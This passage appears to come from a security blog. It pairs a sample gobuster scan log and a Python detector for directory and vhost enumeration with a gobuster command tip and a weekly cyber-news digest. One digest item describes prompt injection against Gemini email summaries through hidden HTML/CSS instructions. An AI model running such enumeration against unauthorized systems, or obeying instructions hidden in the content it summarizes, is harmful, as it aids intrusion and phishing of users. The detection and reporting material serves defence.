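www.examplesite.com:443 203.0.113.9 - - [17/Jul/2025:16:20:01 +0000] "GET /index.php HTTP/1.1" 200 6690 "-" "Mozilla/5.0"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:02 +0000] "GET /admin HTTP/1.1" 404 277 "-" "gobuster/3.6"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:02 +0000] "GET /backup HTTP/1.1" 404 277 "-" "gobuster/3.6"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:03 +0000] "GET /cgi-bin HTTP/1.1" 404 277 "-" "gobuster/3.6"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:03 +0000] "GET /css HTTP/1.1" 301 0 "-" "gobuster/3.6"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:04 +0000] "GET /dev HTTP/1.1" 404 277 "-" "gobuster/3.6"
www.examplesite.com:443 198.51.100.7 - - [17/Jul/2025:16:20:04 +0000] "GET /old HTTP/1.1" 404 277 "-" "gobuster/3.6"
auto.examplesite.com:443 192.0.2.44 - - [17/Jul/2025:08:11:38 +0000] "GET / HTTP/1.1" 200 162 "-" "Mozilla/5.0"
mail.examplesite.com:443 192.0.2.44 - - [17/Jul/2025:08:11:38 +0000] "GET / HTTP/1.1" 200 162 "-" "Mozilla/5.0"
beta.examplesite.com:443 192.0.2.44 - - [17/Jul/2025:08:11:39 +0000] "GET / HTTP/1.1" 200 162 "-" "Mozilla/5.0"
api.examplesite.com:443 192.0.2.44 - - [17/Jul/2025:08:11:39 +0000] "GET / HTTP/1.1" 200 162 "-" "Mozilla/5.0"
zzz.examplesite.com:443 192.0.2.44 - - [17/Jul/2025:08:11:40 +0000] "GET / HTTP/1.1" 200 162 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<host>[^:\s]+):\d+\s+(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<path>\S+)[^"]*"\s+(?P<status>\d{3})\s+\S+\s+"[^"]*"\s+"(?P<ua>[^"]*)"'
)


def parse_log(text):
    """Return one dict per parseable line, with status as int and ts as datetime."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["status"] = int(d["status"])
        d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append(d)
    return events


def detect(events, window_seconds=60, not_found_threshold=5, host_threshold=4):
    """Per source IP, flag (a) >= not_found_threshold 404s inside one sliding
    window (path enumeration), (b) >= host_threshold distinct Host headers
    (vhost enumeration), and (c) a scanner User-Agent. Thresholds are assumed
    starting points; tune them against your own baseline traffic."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        reasons = []
        not_found = [e["ts"] for e in evs if e["status"] == 404]
        for i in range(len(not_found)):
            j = i
            while j + 1 < len(not_found) and (not_found[j + 1] - not_found[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= not_found_threshold:
                reasons.append(f"{j - i + 1} x 404 within {window_seconds}s")
                break
        hosts = {e["host"] for e in evs}
        if len(hosts) >= host_threshold:
            reasons.append(f"{len(hosts)} distinct Host headers")
        scanner_uas = sorted({e["ua"] for e in evs if "gobuster" in e["ua"].lower()})
        if scanner_uas:
            reasons.append("scanner User-Agent: " + ", ".join(scanner_uas))
        if reasons:
            alerts[ip] = reasons
    return alerts


if __name__ == "__main__":
    for ip, reasons in detect(parse_log(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(reasons))
```

The 404 window is the robust signal of the three: a real visitor rarely produces five misses in a minute, whereas a wordlist run produces hundreds. The distinct-Host check only works if the log records the client's Host header, which is the configuration caveat noted above.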

Gobuster has many more options that can be added to our basic scans. For example, we can use the "--delay" flag to make each thread wait between requests, which helps with stability, performance, and stealth. Or the "-x" flag, which appends file extensions to each wordlist entry so that each word is also requested as word.php, word.txt and so on. For instance, if you want to search specifically for images, you might use the following command:

gobuster dir -u https://examplesite.com -w /usr/share/dirb/wordlists/common.txt -x jpg,jpeg,png,gif,ico

Be sure to check out additional flags by using "--help".

7/18/2025

CyberChannel: Week of 7/13/25

Google Gemini Flaw Exposes Users to Advanced Phishing via Email Summaries 

A critical Google Gemini flaw has been identified, allowing sophisticated phishing attacks through email summaries. This vulnerability leverages "prompt-injection" techniques, where attackers embed hidden malicious instructions within emails using HTML/CSS. When Google Gemini generates AI summaries, it unknowingly displays these harmful prompts as legitimate content, potentially directing users to dangerous phishing sites. Unlike traditional spam, these cybersecurity threats bypass standard filters due to their trusted appearance within Gemini's interface, creating a significant risk for users despite no current evidence of in-the-wild exploitation.

Gigabyte Firmware Flaw: Malware Can Disable Secure Boot & Gain Full Control 

A critical UEFI firmware vulnerability impacts numerous Gigabyte motherboards (legacy Intel-based), allowing malware to bypass Secure Boot. This serious security flaw enables attackers to execute code in System Management Mode (SMM), gaining persistent, stealthy control over the system, undetected by standard operating system defenses. While requiring initial administrative access, exploitation occurs early in the boot process. Gigabyte urges users to perform a firmware update to mitigate this significant security risk.  

Interlock Ransomware Unleashes "FileFix" Attack for Stealthy Malware Delivery 

The Interlock ransomware group is now using a novel "FileFix" attack to distribute its malware, including advanced PHP and Node.js Remote Access Trojans (RATs). This sophisticated cybersecurity threat compromises legitimate websites, tricking users into a fake "human verification" process that coaxes them into executing malicious commands, effectively bypassing traditional security. Once active, the Interlock RAT establishes persistence, performs reconnaissance, and leverages services like Cloudflare Tunnel for stealthy command-and-control, representing a significant and evolving malware delivery method impacting various industries. 

Police Bust "Diskstation" Ransomware Gang Targeting Synology NAS Devices 

An international law enforcement operation led by Europol has successfully dismantled the "Diskstation" ransomware gang, which specifically targeted Synology NAS devices globally since 2021. This cybercrime group, operating from Romania, exploited internet-exposed Network-Attached Storage (NAS) devices to encrypt data and demand significant ransom payments. Through forensic analysis and blockchain tracing, police identified key suspects, leading to raids and the arrest of the alleged primary operator.

North Korean XORIndex Malware Found in 67 Malicious npm Packages 

North Korean threat actors are exploiting the npm Registry with 67 malicious packages, deploying advanced XORIndex malware within their "Contagious Interview" cybersecurity campaign. This highly obfuscated malware specifically targets JavaScript developers in the open-source ecosystem, designed to exfiltrate critical host telemetry and cryptocurrency wallet credentials.  

CVE-2025-25257: FortiWeb Vulnerability Enables Unauthenticated RCE Attacks 

A critical Fortinet FortiWeb vulnerability (CVE-2025-25257) is allowing unauthenticated remote code execution (RCE) due to a SQL injection flaw. Attackers are actively exploiting this in the wild, deploying webshells on unpatched FortiWeb appliances via public Proof-of-Concept exploits. These successful FortiWeb hacks grant attackers persistent access and control over the affected devices. Organizations must patch immediately or disable the administrative interface to mitigate this severe cybersecurity risk. 

U.S. Army Soldier Pleads Guilty to Hacking & Extortion of Tech/Telecom Firms 

A former U.S. Army soldier, Cameron John Wagenius ("kiberphan0m"), has pleaded guilty to hacking and extortion charges, targeting 10 prominent tech and telecom firms. While on active duty, Wagenius orchestrated data breaches, stealing sensitive data like customer records and call logs using tools such as SSH Brute. He then attempted to extort over $1 million in ransom from these companies, threatening to leak the stolen information on cybercrime forums. Wagenius also admitted to unlawfully transferring confidential phone records and is linked to the Snowflake data breach, highlighting a significant cybersecurity threat from inside actors. 

Salt Typhoon Breaches National Guard: Chinese Hackers Steal Network Configs 

A Chinese state-sponsored hacking group, Salt Typhoon, successfully breached a U.S. Army National Guard network for nine months, stealing critical network configurations, administrator credentials, and service members' personal data. This cybersecurity breach highlights the persistent threat from Chinese hackers who target old vulnerabilities in networking devices. Salt Typhoon, linked to China's Ministry of State Security, has a history of compromising U.S. government and critical infrastructure, prompting the Department of Homeland Security (DHS) to issue warnings and urge immediate patching and stronger access controls to combat these sophisticated APT attacks.  

New AI Malware Threat: LameHug Uses LLMs for Dynamic Data Exfiltration 

A new cybersecurity threat, LameHug malware, is emerging, characterized by its innovative use of AI Large Language Models (LLMs) to craft Windows data-theft commands in real-time. This sophisticated AI-powered malware dynamically generates precise commands for data exfiltration from compromised systems. Leveraging LLM capabilities, LameHug can adapt its attack methods on the fly, posing a significant challenge to traditional security defenses and marking an advanced step in how threat actors weaponize artificial intelligence for more potent and evasive malware attacks. 

CVE-2025-5777: Citrix Bleed 2 Actively Exploited Before Public PoCs 

A critical Citrix Bleed 2 vulnerability (CVE-2025-5777) in Citrix NetScaler ADC and Gateway appliances was actively exploited by threat actors for weeks, even as Citrix denied attacks. This security flaw (a memory disclosure vulnerability) allows attackers to bypass MFA and hijack user sessions by leaking sensitive data like session tokens. With public PoC exploits now available, widespread exploitation has led to its inclusion in CISA's Known Exploited Vulnerabilities catalog. Organizations must urgently patch Citrix Bleed 2 and terminate all sessions to mitigate this severe cybersecurity risk and prevent further Citrix hacks.